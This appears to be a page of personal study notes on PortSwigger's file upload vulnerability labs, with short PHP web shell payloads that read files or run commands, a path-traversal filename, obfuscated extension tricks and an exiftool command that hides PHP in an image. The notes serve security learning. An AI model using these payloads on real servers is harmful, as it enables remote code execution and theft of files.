🕸️
Web Security Notes
  • README
  • Portswigger
    • Access Control
      • notes
      • labs
    • Authentication
      • notes
      • labs
    • Business Logic Vulnerabilities
      • notes
      • labs
    • Clickjacking
      • notes
      • labs
    • Command Injection
      • notes
      • labs
    • CORS
      • notes
      • labs
    • CSRF
      • notes
      • labs
    • Directory Traversal
      • notes
      • labs
    • DOM-based Vulnerabilities
      • notes
      • labs
    • File upload Vulnerabilities
      • notes
      • labs
    • HTTP Host Header Attacks
      • notes
      • labs
    • HTTP Request Smuggling
      • notes
      • labs
    • Information Disclosure
      • notes
      • labs
    • Insecure Deserialization
      • notes
      • labs
    • JWT Attacks
      • notes
      • labs
    • OAuth Authentication
      • notes
      • labs
    • Server Side Template Injection
      • notes
      • labs
    • SQL injection
      • notes
      • labs
      • cheat sheet
    • SSRF
      • notes
      • labs
    • Web Cache Poisoning
      • notes
      • labs
    • WebSockets
      • notes
      • labs
    • XSS
      • notes
      • labs
    • XXE Injection
      • notes
      • labs
Powered by GitBook
On this page
  • 1. Remote code execution via web shell upload
  • 2. Content-Type restriction bypass
  • 3. Web shell upload via path traversal
  • 4. Web shell upload via obfuscated file extension
  • 5. Web shell with polygoat
  1. Portswigger
  2. File upload Vulnerabilities

notes

<?php echo file_get_contents('/path/to/target/file'); ?> // read files from server's filesystem
<?php echo system($_GET['command']); ?>

-execute this command by GET /example/exploit.php?command=id HTTP/1.1

1. Remote code execution via web shell upload

<?php echo file_get_contents('home/carlos/secret'); >

GET /files/avatars/exploit.php

2. Content-Type restriction bypass

  • change Content-Type: image/png in POST request

3. Web shell upload via path traversal

  • change the file upload path (one directory above) by Content-Disposition: form-data; name="avatar"; filename="..%2fexploit.php

4. Web shell upload via obfuscated file extension

  • exploit.pHp

  • exploit.php.jpg

  • exploit%2ephp

  • exploit.php%00.jpg

  • exploit.asp;.jpg , exploit.asp%00.jpg

5. Web shell with polygoat

exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" your_image.png -o polygoat.php
PreviousFile upload VulnerabilitiesNextlabs

Last updated 2 years ago